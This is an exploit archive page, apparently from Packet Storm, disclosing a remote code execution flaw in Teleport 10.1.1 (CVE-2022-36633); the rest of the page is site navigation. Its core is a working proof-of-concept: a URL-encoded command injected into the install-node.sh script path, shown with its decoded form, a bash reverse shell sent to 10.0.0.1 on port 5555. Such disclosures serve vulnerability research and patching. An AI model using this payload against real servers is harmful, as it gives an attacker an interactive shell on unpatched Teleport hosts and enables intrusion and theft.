Teleport 10.1.1 Remote Code Execution

Teleport 10.1.1 Remote Code Execution: Posted Sep 23, 2022; Authored by Brian Landrum, Brandon Roach; Teleport version 10.1.1 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2022-36633; SHA-256 | c6d52b424ef6fecae4f1b523bd776835ab95ce19413a32ddacde1e3e5c128f9e; Download | Favorite | View

Teleport 10.1.1 Remote Code Execution

# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633

Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
method=3Diam


Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

Top Authors In Last 30 Days

Red Hat 263 files
indoushka 179 files
Jay Turla 150 files
Ubuntu 85 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,340)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,897)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,876)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

Teleport 10.1.1 Remote Code Execution

Teleport 10.1.1 Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Teleport 10.1.1 Remote Code Execution

Share This

Teleport 10.1.1 Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems